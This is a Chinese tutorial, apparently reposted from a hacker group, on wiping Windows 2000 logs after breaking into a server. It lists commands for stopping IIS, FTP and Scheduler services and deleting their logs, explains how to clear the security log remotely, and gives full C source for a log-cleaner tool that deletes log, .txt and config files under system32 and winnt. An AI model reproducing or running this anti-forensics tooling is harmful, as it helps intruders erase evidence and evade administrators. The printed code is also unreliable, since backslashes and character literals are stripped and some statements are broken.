程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 數據庫知識 >> SqlServer數據庫 >> 關於SqlServer >> windows2000的日志清除器怎麼練成

windows2000的日志清除器怎麼練成

編輯:關於SqlServer

       Windows2000的日志文件通常有應用程序日志,安全日志、系統日志、DNS服務器日志、

      FTP日志、WWW日志等等,可能會根據服務器所開啟的服務不同。

      一般步驟如下:

      1.清除IIs的日志。

      可不要小看IIS的日志功能,它可以詳細的記錄下你的入侵全過程,如

      如你用unicode入侵時ie裡打的命令,和對80端口掃描時留下的痕跡。你可能就因為對

      其不注意,而被網管盯上,說不定還會.......呵呵

      那我們就可手動清除吧

      1.日志的默認位置:%systemroot%system32logfilesw3svc1,默認每天一個日志

      那我們就切換到這個目錄下吧

      del *.*

      你大概想是安全了吧,那就dir一下吧

      咦,咦,今天的日志怎麼還在,不要慌。因為w3svc服務還開著,那我們怎麼清除這個日志文件呢?

      方法一:如有3389可以登錄,那就用notepad打開,把Ctrl+A 然後del吧。

      方法二:net 命令

      C:>net stop w3svc

      World Wide Web Publishing Service 服務正在停止.(可能會等很長的時間,也可能不成功)

      World Wide Web Publishing Service 服務已成功停止。

      好了w3svc停止了,我們可以清空它的日志了,del *.*吧

      還有不要忘了再打開w3svc服務呀

      C:>net start w3svc

      2.清除ftp日志。

      FTP日志默認位置:%systemroot%sys tem32logfilesmsftpsvc1,默認每天一個日志

      清除方法同上

      3.清除Scheduler日志

      Scheduler服務日志默認位置:%systemroot%schedlgu.txt

      清除方法同上

      4.應用程序日志、安全日志、系統日志、DNS日志默認位置:%systemroot%sys tem32config

      清除方法同上

      注意以上三個目錄可能不在上面的位置,那是因為管理員做的修改

      可以讀取注冊表值得到他們的位置

      應用程序日志,安全日志,系統日志,DNS服務器日志,它們這些LOG文件在注冊表中的:

      HKEY_LOCAL_MACHINEsys temCurrentControlSetServicesEventlog

      Schedluler服務日志在注冊表中

      HKEY_LOCAL_MACHINESOFTWAREMicrosoftSchedulingAgent

      5.我是借鑒了別人文章(其實就是抄了)

      OK!恭喜,現在簡單的日志都已成功刪除。下面就是很難的安全日志和系統日志了,守護這些日志的服務是Event Log,試著停掉它!

      D:SERVERsys tem32LogFilesW3SVC1>net stop eventlog

      這項服務無法接受請求的 "暫停" 或 "停止" 操作。

      KAO,I 服了 U,沒辦法,它是關鍵服務。如果不用第三方工具,在命令行上根本沒有刪除安全日志和系統日志的可能!所以還是得用雖然簡單但是速度慢得死機的辦法:打開“控制面板”的“管理工具”中的“事件查看器”(98沒有,知道用Win2k的好處了吧),在菜單的“操作”項有一個名為“連接到另一台計算機”的菜單,點擊它如下圖所示:

      輸入遠程計算機的IP,然後點支煙,等上數十分鐘,忍受象死機的折磨,然後打開下圖:

      選擇遠程計算機的安全性日志,右鍵選擇它的屬性:

      點擊屬性裡的“清除日志”按鈕,OK!安全日志清除完畢!同樣的忍受痛苦去清除系統日志!

      6.上面大部分重要的日志你都已經清除了。然後要做的就是以防萬一還有遺漏的了。

      那就這樣做吧 del以下的一些文件

      winnt*.log

      system32下

      logfiles*.*

      dtclog*.*

      config*.evt

      *.log

      *.txt

      到目前為止,我所知的大部分的日志我們已經教會了你清除的方法,那你就學以致用吧。

      其實這篇文章的主要日的,不是教你怎麼清除日志,而是教你寫一個日志清除的工具。

      就當我前面說的都是屁話吧。

      現在轉入正題:

      前面你已經看到了要清除全部的日志的過程,是不是很繁呀,手動可是要花不少時間。有時

      候還不一定可以清除干淨。那就於編程的朋友來說,那就會想,可以我會編程,我怕什麼。

      那我們就動手吧。

      你已經了解了,要清除一些日志,首先要關閉一些服務程序

      那我就先教你怎麼寫一個可以看機器的服務程序的dos小工具吧,具體實現看我以前的文章

      《如果做一個dos下的服務程序查看器》

      工具名serName.exe

      運行一下serName.exe吧

      serName.exe -t 1 -t 1

      呵呵,所有的機器正在運行的服務程序顯示出來了吧。

      記住你要關的服務程序名吧,下面會有用的。

      那編程的第二步就是實現關w3svc和shedule還有ftp等服務程序了。

      我寫的代碼如下

      對著msdn慢慢看吧。(不難的,有什麼不懂不要來問我)

      void StopServices(LPCTSTR lpServiceName)

      {

      SC_HANDLE scman = ::OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);

      if(scman)

      {

      SC_HANDLE sh = ::OpenService(scman,lpServiceName,SERVICE_STOP);

      if(sh)

      {

      BOOL bControl;

      SERVICE_STATUS ServiceStatus;

      bControl=ControlService(sh,SERVICE_CONTROL_STOP,&ServiceStatus);

      DWORD dwControl;

      if(bControl)

      {

      printf("success to stop the service "%s"n",lpServiceName);

      }

      else

      {

      dwControl=::GetLastError();

      switch(dwControl){

      case ERROR_ACCESS_DENIED :printf("The specified handle was not opened with the necessary access.n");break;

      case ERROR_SERVICE_NOT_ACTIVE :printf("The service has not been started.n");break;

      case ERROR_DEPENDENT_SERVICES_RUNNING :printf("The service cannot be stopped because other running services are dependent on it.n");break;

      case ERROR_INVALID_SERVICE_CONTROL:printf("The requested control code is not valid, or it is unacceptable to the service.n");break;

      case ERROR_SERVICE_CANNOT_ACCEPT_CTRL:printf("The requested control code cannot be sent to the service because the state of the service is SERVICE_STOPPED, SERVICE_START_PENDING, or SERVICE_STOP_PENDING.n");break;

      case ERROR_SERVICE_REQUEST_TIMEOUT:printf("The service did not respond to the start request in a timely fashion.n");break;

      }

      }

      }

      ::CloseServiceHandle(sh);

      }

      ::CloseServiceHandle(scman);

      return;

      }

      函數有了,那就寫個main函數試試吧

      void main()

      {

      StopServices("W3SVC");

      return;

      }

      ok.成功了,如果沒有成功,請參照輸出的錯誤提示。

      好了有了一個可以停止的服務程序的函數,

      那我們還需要一個可以開啟服務程序的函數

      其實以上的看懂了,下面的代碼只是對上面的代碼的一些小變動。

      void StartServices(LPCTSTR lpServiceName)

      {

      SC_HANDLE scman = ::OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);

      if(scman)

      {

      SC_HANDLE sh = ::OpenService(scman,lpServiceName,SERVICE_START);

      if(sh)

      {

      BOOL bControl;

      bControl=StartService(sh,1,&lpServiceName);

      DWORD dwControl;

      if(bControl)

      {

      printf("success to start the service "%s"n",lpServiceName);

      }

      else

      {

      dwControl=::GetLastError();

      switch(dwControl){

      case ERROR_ACCESS_DENIED :printf("The specified handle was not opened with SERVICE_START access.n");break;

      case ERROR_INVALID_HANDLE :printf("The specified handle is invalid.n");break;

      case ERROR_PATH_NOT_FOUND :printf("The service binary file could not be found.n");break;

      case ERROR_SERVICE_ALREADY_RUNNING:printf("An instance of the service is already running.n");break;

      case ERROR_SERVICE_DATABASE_LOCKED:printf("The database is locked.n");break;

      case ERROR_SERVICE_DEPENDENCY_DELETED:printf("The service depends on a service that does not exist or has been marked for deletion.n");break;

      case ERROR_SERVICE_DEPENDENCY_FAIL:printf("The service depends on another service that has failed to start.n");break;

      case ERROR_SERVICE_DISABLED:printf("The service has been disabled.n");break;

      case ERROR_SERVICE_LOGON_FAILED:printf("The service could not be logged on.n");break;

      case ERROR_SERVICE_MARKED_FOR_DELETE:printf("The service has been marked for deletion.n");break;

      case ERROR_SERVICE_NO_THREAD:printf("A thread could not be created for the service.n");break;

      case ERROR_SERVICE_REQUEST_TIMEOUT:printf("The service did not respond to the start request in a timely fashion.n");break;

      }

      }

      }

      ::CloseServiceHandle(sh);

      }

      ::CloseServiceHandle(scman);

      return;

      }

      呵呵,只是一些小變動。

      現在你已經有了這兩樣武器,那下面的就是動用上面第一部分的一些知識,去del文件了,我想不用我教,你也一定想到怎麼做了吧。

      現在那再教第三個武器吧,雖然他對我們的程序可有可無,但對一個漂亮的程序他卻是必需的,那就是一個判斷服務程序狀態的函數。

      我的代碼如下。

      DWORD GetServicesState(LPCTSTR lpServiceName)

      {

      DWORD dwState;

      SC_HANDLE scman = ::OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);

      if(scman)

      {

      SC_HANDLE sh = ::OpenService(scman,lpServiceName,SERVICE_QUERY_STATUS);

      if(sh)

      {

      BOOL bQuery;

      SERVICE_STATUS ServiceStatus;

      bQuery=QueryServiceStatus(sh,&ServiceStatus);

      if(!bQuery)

      {

      DWORD dwControl;

      dwControl=::GetLastError();

      switch(dwControl){

      case ERROR_ACCESS_DENIED :printf("The specified handle was not opened with SERVICE_QUERY_STATUS access.n");break;

      case ERROR_INVALID_HANDLE :printf("The specified handle is invalid.n");break;

      }

      dwState=0;

      }

      else

      {

      dwState=ServiceStatus.dwCurrentState;

      }

      }

      ::CloseServiceHandle(sh);

      }

      ::CloseServiceHandle(scman);

      return dwState;

      }

      好了現在什麼都有了,那就把代碼完成吧。

      其他代碼如下。希望你在運行前安照你入侵的系統的具體情況修改一下源代碼。

      //==========================================================//

      // 綠兵日志Cleaner1.0 //

      // Compiled by http://www.vertarmy.com 綠色兵團 //

      // http://vcghost.yeah.net 編の魂(tryibest) //

      // [email protected] //

      // //

      //==========================================================//

      #include "windows.h"

      #include "stdio.h"

      void StopServices(LPCTSTR lpServiceName);

      void StartServices(LPCTSTR lpServiceName);

      DWORD GetServicesState(LPCTSTR lpServiceName);

      void DelFiles(LPCTSTR lpFileName,LPCTSTR lpDirectory);

      void Del3WFile();

      void DelFtpFile();

      void DelSheduleFile();

      void DelOtherFile();

      void ShowTitle();

      void main(int argc, char *argv[])

      {

      ShowTitle();

      DelOtherFile();

      Del3WFile();

      DelFtpFile();

      DelSheduleFile();

      ShowTitle();

      return;

      }

      void StopServices(LPCTSTR lpServiceName)

      {

      SC_HANDLE scman = ::OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);

      if(scman)

      {

      SC_HANDLE sh = ::OpenService(scman,lpServiceName,SERVICE_STOP);

      if(sh)

      {

      BOOL bControl;

      SERVICE_STATUS ServiceStatus;

      bControl=ControlService(sh,SERVICE_CONTROL_STOP,&ServiceStatus);

      DWORD dwControl;

      if(bControl)

      {

      printf("success to stop the service "%s"n",lpServiceName);

      }

      else

      {

      dwControl=::GetLastError();

      switch(dwControl){

      case ERROR_ACCESS_DENIED :printf("The specified handle was not opened with the necessary access.n");break;

      case ERROR_SERVICE_NOT_ACTIVE :printf("The service has not been started.n");break;

      case ERROR_DEPENDENT_SERVICES_RUNNING :printf("The service cannot be stopped because other running services are dependent on it.n");break;

      case ERROR_INVALID_SERVICE_CONTROL:printf("The requested control code is not valid, or it is unacceptable to the service.n");break;

      case ERROR_SERVICE_CANNOT_ACCEPT_CTRL:printf("The requested control code cannot be sent to the service because the state of the service is SERVICE_STOPPED, SERVICE_START_PENDING, or SERVICE_STOP_PENDING.n");break;

      case ERROR_SERVICE_REQUEST_TIMEOUT:printf("The service did not respond to the start request in a timely fashion.n");break;

      }

      }

      }

      ::CloseServiceHandle(sh);

      }

      ::CloseServiceHandle(scman);

      return;

      }

      void StartServices(LPCTSTR lpServiceName)

      {

      SC_HANDLE scman = ::OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);

      if(scman)

      {

      SC_HANDLE sh = ::OpenService(scman,lpServiceName,SERVICE_START);

      if(sh)

      {

      BOOL bControl;

      bControl=StartService(sh,1,&lpServiceName);

      DWORD dwControl;

      if(bControl)

      {

      printf("success to start the service "%s"n",lpServiceName);

      }

      else

      {

      dwControl=::GetLastError();

      switch(dwControl){

      case ERROR_ACCESS_DENIED :printf("The specified handle was not opened with SERVICE_START access.n");break;

      case ERROR_INVALID_HANDLE :printf("The specified handle is invalid.n");break;

      case ERROR_PATH_NOT_FOUND :printf("The service binary file could not be found.n");break;

      case ERROR_SERVICE_ALREADY_RUNNING:printf("An instance of the service is already running.n");break;

      case ERROR_SERVICE_DATABASE_LOCKED:printf("The database is locked.n");break;

      case ERROR_SERVICE_DEPENDENCY_DELETED:printf("The service depends on a service that does not exist or has been marked for deletion.n");break;

      case ERROR_SERVICE_DEPENDENCY_FAIL:printf("The service depends on another service that has failed to start.n");break;

      case ERROR_SERVICE_DISABLED:printf("The service has been disabled.n");break;

      case ERROR_SERVICE_LOGON_FAILED:printf("The service could not be logged on.n");break;

      case ERROR_SERVICE_MARKED_FOR_DELETE:printf("The service has been marked for deletion.n");break;

      case ERROR_SERVICE_NO_THREAD:printf("A thread could not be created for the service.n");break;

      case ERROR_SERVICE_REQUEST_TIMEOUT:printf("The service did not respond to the start request in a timely fashion.n");break;

      }

      }

      }

      ::CloseServiceHandle(sh);

      }

      ::CloseServiceHandle(scman);

      return;

      }

      DWORD GetServicesState(LPCTSTR lpServiceName)

      {

      DWORD dwState;

      SC_HANDLE scman = ::OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);

      if(scman)

      {

      SC_HANDLE sh = ::OpenService(scman,lpServiceName,SERVICE_QUERY_STATUS);

      if(sh)

      {

      BOOL bQuery;

      SERVICE_STATUS ServiceStatus;

      bQuery=QueryServiceStatus(sh,&ServiceStatus);

      if(!bQuery)

      {

      DWORD dwControl;

      dwControl=::GetLastError();

      switch(dwControl){

      case ERROR_ACCESS_DENIED :printf("The specified handle was not opened with SERVICE_QUERY_STATUS access.n");break;

      case ERROR_INVALID_HANDLE :printf("The specified handle is invalid.n");break;

      }

      dwState=0;

      }

      else

      {

      dwState=ServiceStatus.dwCurrentState;

      }

      }

      ::CloseServiceHandle(sh);

      }

      ::CloseServiceHandle(scman);

      return dwState;

      }

      void DelFiles(LPCTSTR lpFileName,LPCTSTR lpDirectory)

      {

      TCHAR tcFileName[1024];

      HANDLE hFile;

      WIN32_FIND_DATA FindFileData;

      hFile=FindFirstFile(lpFileName,&FindFileData);

      if(hFile!=INVALID_HANDLE_VALUE)

      {

      while(1)

      {

      lstrcpy(tcFileName,lpDirectory);

      lstrcat(tcFileName,FindFileData.cFileName);

      BOOL dDel=DeleteFile(tcFileName);

      if(dDel)

      {

      printf("delete file "%s" successn",tcFileName);

      }

      else

      {

      printf("delte file "%s" failn",tcFileName);

      }

      if(!FindNextFile(hFile,&FindFileData))

      {

      break;

      }

      }

      }

      FindClose(hFile);

      }

      void Del3WFile()

      {

      TCHAR tcSystemDirectory[1024];

      ::GetSystemDirectory(tcSystemDirectory,1024);

      TCHAR tc3WDirectory[1024];

      TCHAR tc3WFile[1024];

      lstrcpy(tc3WDirectory,tcSystemDirectory);

      lstrcpy(tc3WFile,tcSystemDirectory);

      lstrcat(tc3WFile,"logfilesw3svc1*.log");

      lstrcat(tc3WDirectory,"logfilesw3svc1");

      DWORD dwState;

      dwState=GetServicesState("w3svc");

      if(dwState==SERVICE_RUNNING)

      {

      StopServices("w3svc");

      ::Sleep(1000);

      DelFiles(tc3WFile,tc3WDirectory);

      ::Sleep(1000);//應該考慮用線程

      StartServices("w3svc");

      }

      else

      {

      DelFiles(tc3WFile,tc3WDirectory);

      }

      }

      void DelFtpFile()

      {

      TCHAR tcSystemDirectory[1024];

      ::GetSystemDirectory(tcSystemDirectory,1024);

      TCHAR tcFtpDirectory[1024];

      TCHAR tcFtpFile[1024];

      lstrcpy(tcFtpDirectory,tcSystemDirectory);

      lstrcpy(tcFtpFile,tcSystemDirectory);

      lstrcat(tcFtpFile,"logfilesmsftpsvc1*.log");

      lstrcat(tcFtpDirectory,"logfilesmsftpsvc1");

      DWORD dwState;

      dwState=GetServicesState("msftpsvc");

      if(dwState==SERVICE_RUNNING)

      {

      StopServices("msftpsvc");

      ::Sleep(1000);

      DelFiles(tcFtpFile,tcFtpDirectory);

      ::Sleep(1000);//應該考慮用線程

      StartServices("msftpsvc");

      }

      else

      {

      DelFiles(tcFtpFile,tcFtpDirectory);

      }

      }

      void DelSheduleFile()

      {

      TCHAR tcSystemDirectory[1024];

      ::GetSystemDirectory(tcSystemDirectory,1024);

      TCHAR tcScheduleFile[1024];

      lstrcpy(tcScheduleFile,tcSystemDirectory);

      int iLength=lstrlen(tcScheduleFile);

      while(1)

      {

      iLength--;

      if(tcScheduleFile[iLength]==)

      break;

      }

      tcScheduleFile[iLength]=;

      lstrcat(tcScheduleFile,"SchedLgU.txt");

      DWORD dwState;

      dwState=GetServicesState("schedule");

      if(dwState==SERVICE_RUNNING)

      {

      StopServices("schedule");

      ::Sleep(1000);

      BOOL dDel=DeleteFile(tcScheduleFile);

      if(dDel)

      {

      printf("delete file "%s" successn",tcScheduleFile);

      }

      else

      {

      printf("delte file "%s" failn",tcScheduleFile);

      }

      // DelFiles(tcScheduleFile,tcScheduleDirectory);

      ::Sleep(1000);//應該考慮用線程

      StartServices("schedule");

      }

      else

      {

      BOOL dDel=DeleteFile(tcScheduleFile);

      if(dDel)

      {

      printf("delete file "%s" successn",tcScheduleFile);

      }

      else

      {

      printf("delte file "%s" failn",tcScheduleFile);

      }

      // DelFiles(tcScheduleFile,tcScheduleDirectory);

      }

      }

      void DelOtherFile()

      {

      TCHAR tcSystemDirectory[1024];

      ::GetSystemDirectory(tcSystemDirectory,1024);

      TCHAR tcOtherFile[1024];

      TCHAR tcOtherDirectory[1024];

      //刪除logfiles下全部文件

      lstrcpy(tcOtherFile,tcSystemDirectory);

      lstrcpy(tcOtherDirectory,tcSystemDirectory);

      lstrcat(tcOtherFile,"logfiles*.*");

      lstrcat(tcOtherDirectory,"logfiles");

      DelFiles(tcOtherFile,tcOtherDirectory);

      //刪除dtclog下全部文件

      lstrcpy(tcOtherFile,tcSystemDirectory);

      lstrcpy(tcOtherDirectory,tcSystemDirectory);

      lstrcat(tcOtherFile,"dtclog*.*");

      lstrcat(tcOtherDirectory,"dtclog");

      DelFiles(tcOtherFile,tcOtherDirectory);

      //刪除config下全部文件

      lstrcpy(tcOtherFile,tcSystemDirectory);

      lstrcpy(tcOtherDirectory,tcSystemDirectory);

      lstrcat(tcOtherFile,"config*.*");

      lstrcat(tcOtherDirectory,"config");

      DelFiles(tcOtherFile,tcOtherDirectory);

      //刪除system32下全部log文件

      lstrcpy(tcOtherFile,tcSystemDirectory);

      lstrcpy(tcOtherDirectory,tcSystemDirectory);

      lstrcat(tcOtherFile,"*.log");

      lstrcat(tcOtherDirectory,"");

      DelFiles(tcOtherFile,tcOtherDirectory);

      //刪除system32下全部的txt文件

      lstrcpy(tcOtherFile,tcSystemDirectory);

      lstrcpy(tcOtherDirectory,tcSystemDirectory);

      lstrcat(tcOtherFile,"*.txt");

      lstrcat(tcOtherDirectory,"");

      DelFiles(tcOtherFile,tcOtherDirectory);

      //得到winnt目錄路徑

      TCHAR tcWinDirectory[1024];

      lstrcpy(tcWinDirectory,tcSystemDirectory);

      int iLength=lstrlen(tcWinDirectory);

      while(1)

      {

      iLength--;

      if(tcWinDirectory[iLength]==)

      break;

      }

      tcWinDirectory[iLength]=;

      //刪除winnt*.log

      lstrcpy(tcOtherFile,tcWinDirectory);

      lstrcpy(tcOtherDirectory,tcWinDirectory);

      lstrcat(tcOtherFile,"*.log");

      lstrcat(tcOtherDirectory,"");

      DelFiles(tcOtherFile,tcOtherDirectory);

      //刪除winnt*.txt

      lstrcpy(tcOtherFile,tcWinDirectory);

      lstrcpy(tcOtherDirectory,tcWinDirectory);

      lstrcat(tcOtherFile,"*.txt");

      lstrcat(tcOtherDirectory,"");

      DelFiles(tcOtherFile,tcOtherDirectory);

      }

      void ShowTitle()

      {

      printf("===========================================================n");

      printf("$ 綠兵日志Cleaner1.0 $n");

      printf("$ Compiled by http://www.vertarmy.com 綠色兵團 $n");

      printf("$ http://vcghost.yeah.net 編の魂(tryibest) $n");

      printf("$ [email protected] $n");

      printf("===========================================================n");

      }

    1. 上一頁:
    2. 下一頁:
    Copyright © 程式師世界 All Rights Reserved